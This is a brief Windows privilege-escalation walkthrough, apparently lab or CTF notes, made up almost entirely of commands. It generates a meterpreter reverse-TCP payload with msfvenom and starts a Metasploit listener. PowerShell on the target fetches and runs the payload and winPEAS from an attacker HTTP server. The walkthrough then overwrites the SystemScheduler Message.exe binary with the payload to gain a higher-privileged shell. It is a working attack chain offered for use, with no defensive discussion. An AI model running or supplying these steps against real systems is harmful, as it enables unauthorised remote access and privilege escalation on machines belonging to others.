Windows Privilege Escalation

Generate payload with better shell

hacker machine

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe

Expose shell.exe by local server

hacker machine

python3 -m http.server

Run listener

msfconsole
msf6 > search multi handler
> 5   exploit/multi/handler
...
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Get shell.exe

target machine

powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

target machine

cd C:\Windows\Temp
dir
.\shell.exe

target machine

shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat

target machine

meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"
exit
run

now we should get root shell